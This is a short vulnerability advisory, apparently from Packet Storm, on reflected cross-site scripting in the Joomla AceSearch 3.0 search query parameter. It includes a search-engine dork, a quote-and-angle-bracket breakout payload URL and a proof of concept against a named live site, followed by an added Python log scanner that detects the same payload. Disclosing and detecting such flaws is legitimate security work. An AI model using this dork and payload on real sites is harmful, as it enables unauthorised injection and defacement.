Joomla AceSearch 3.0 Cross Site Scripting

2014-01-06T00:00:00
ID PACKETSTORM:124684
Type packetstorm
Reporter DevilScreaM
Modified 2014-01-06T00:00:00

Description

                                        
                                            `  
  
#Title : Joomla Component AceSearch Cross Site Scripting  
  
#Author : DevilScreaM  
  
#Date : 5 January 2014  
  
#Category : Web Applications  
  
#Product : http://www.joomace.net/joomla-extensions/acesearch/  
  
#Version : 3.0  
  
#Type : PHP  
  
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security  
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber  
  
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |  
  
#Tested : Mozilla, Chrome, Opera -> Windows & Linux  
  
#Vulnerability : Cross Site Scripting  
  
#Dork : inurl:component/acesearch/  
  
  
  
Cross Site Scripting  
  
http://site-target/component/acesearch/search?query=”>[XSS]  
Use “> before the payload as the Cross Site Scripting bypass  
  
Example :  
http://kpi.go.id/index.php/component/acesearch/search?query=”><h1>DevilScreaM</h1>  
`
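For defenders reviewing web server logs, an added example that is not part of the original advisory: a Python scan for requests to the path and `query` parameter named above whose decoded value carries a quote-then-`>` breakout or an opening tag. The Common Log Format layout, the sample lines and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

ACESEARCH_PATH = "/component/acesearch/search"  # path from the advisory
PARAM = "query"                                 # parameter from the advisory
# Quote-then-">" attribute breakout (straight or typographic quote), or a tag opener.
MARKUP = re.compile(r'["\u201c\u201d]\s*>|<\s*[A-Za-z/!]')
# Request field of a Common/Combined Log Format line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; addresses come from the documentation range.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Jan/2014:10:00:01 +0000] "GET /index.php/component/acesearch/search?query=joomla+templates HTTP/1.1" 200 5120',
    '192.0.2.10 - - [06/Jan/2014:10:00:04 +0000] "GET /index.php/component/acesearch/search?query=%22exact+phrase%22 HTTP/1.1" 200 5177',
    '192.0.2.44 - - [06/Jan/2014:10:00:07 +0000] "GET /index.php/component/acesearch/search?query=%22%3E%3Ch1%3Etest%3C%2Fh1%3E HTTP/1.1" 200 5342',
    '192.0.2.44 - - [06/Jan/2014:10:00:09 +0000] "GET /component/acesearch/search?query=%2522%253Eprobe HTTP/1.1" 200 5301',
]


def fully_decode(value, rounds=3):
    """Strip up to `rounds` extra layers of percent-encoding (double encoding)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_query(target):
    """Return the decoded query value if it carries breakout markup, else None."""
    parts = urlsplit(target)
    if ACESEARCH_PATH not in parts.path:
        return None
    for raw in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
        value = fully_decode(raw)
        if MARKUP.search(value):
            return value
    return None


def scan(log_lines):
    """Return (line_number, decoded_value) for every flagged request."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        value = suspicious_query(match.group(1)) if match else None
        if value is not None:
            hits.append((number, value))
    return hits
```

Calling `scan(SAMPLE_LOG)` flags the third and fourth constructed lines and leaves the plain and quoted-phrase searches alone.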